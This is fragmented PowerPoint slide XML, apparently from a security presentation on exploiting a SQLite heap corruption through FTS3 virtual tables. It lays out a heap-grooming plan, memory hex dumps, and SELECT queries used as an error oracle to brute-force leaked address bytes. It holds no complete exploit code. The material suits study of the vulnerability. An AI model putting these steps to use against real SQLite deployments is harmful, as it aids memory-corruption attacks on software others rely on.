              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ success!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SELECT A_1 from table2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ success!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SELECT A_2 from table2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ success!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SELECT A_3 from table2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ success!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SELECT A_4 from table2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A_4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p: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02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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55930"/>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039200466"/>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72401" y="2801711"/>
            <a:ext cx="3460491" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stage 8</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7457" y="1482401"/>
            <a:ext cx="6020994" cy="4190612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3205951107"/>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Plan</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pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>First, free three 0x1000 chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Then, refill them with 3 specific chunks in a specific order.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Try to leak a couple bytes of the address through brute-forcing</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3215971432"/>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10 21 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00 40 CC 2F A4 C3 80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rgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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30 21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6" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532265" y="1059771"/>
            <a:ext cx="3659259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Corrupted Column Object Array</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191524" y="1244437"/>
            <a:ext cx="275824" cy="3849"/>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1862686"/>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10 21 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00 40 CC 2F A4 C3 80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rgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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30 21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3" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5467348" y="227997"/>
            <a:ext cx="5391152" cy="2126200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="FFC000"/>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Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5467348" y="2357113"/>
            <a:ext cx="5391152" cy="2126200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="FFC000"/>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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5467348" y="4486762"/>
            <a:ext cx="5391152" cy="2126200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="FFC000"/>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325390236"/>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10 21 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00 40 CC 2F A4 C3 80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rgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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30 21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20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40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532265" y="4909961"/>
            <a:ext cx="3659259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Fts3 Virtual Table Object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191524" y="5094627"/>
            <a:ext cx="275824" cy="3849"/>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32265" y="3166625"/>
            <a:ext cx="3659259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0x1000 sized Column Name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191524" y="3351291"/>
            <a:ext cx="275824" cy="3849"/>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532265" y="1059771"/>
            <a:ext cx="3659259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191524" y="1244437"/>
            <a:ext cx="275824" cy="3849"/>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7134243"/>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00 40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3" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5535465" y="3764754"/>
            <a:ext cx="2608410" cy="188122"/>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9" name="Curved Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="1"/>
            <a:endCxn id="49" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5467349" y="3858814"/>
            <a:ext cx="68117" cy="2091753"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 761029"/>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7801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 y="0"/>
            <a:ext cx="12192000" cy="3526971"/>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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298579" y="4012163"/>
            <a:ext cx="11579289" cy="2286099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Execute a Google-Style search query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Result :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			sample subject1	 sample </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298580" y="335897"/>
            <a:ext cx="11579289" cy="3004461"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CREATE VIRTUAL TABLE mail USING fts3(subject, body);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO mail(subject, body) VALUES('sample subject1', 'sample content'); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO mail(subject, body) VALUES('sample subject2', 'hello world'); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM mail WHERE body MATCH 'sample';</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2947386" y="5255580"/>
            <a:ext cx="5335480" cy="1024926"/>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 name="Straight Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2947386" y="5759165"/>
            <a:ext cx="533548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597368" y="5264458"/>
            <a:ext cx="0" cy="1024926"/>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2209724"/>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00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 40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46694"/>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248244575"/>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00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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46694"/>
            <a:ext cx="606717" cy="19723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897929378"/>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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513751" y="3530865"/>
            <a:ext cx="3566249" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SELECT BBBB… from table2100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: BBB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080000" y="3854031"/>
            <a:ext cx="387348" cy="1"/>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00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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46694"/>
            <a:ext cx="606717" cy="19723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118654496"/>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00 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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46694"/>
            <a:ext cx="606717" cy="19723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890661039"/>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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513751" y="3530865"/>
            <a:ext cx="3566249" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SELECT BBBB… from table2100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: BBB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
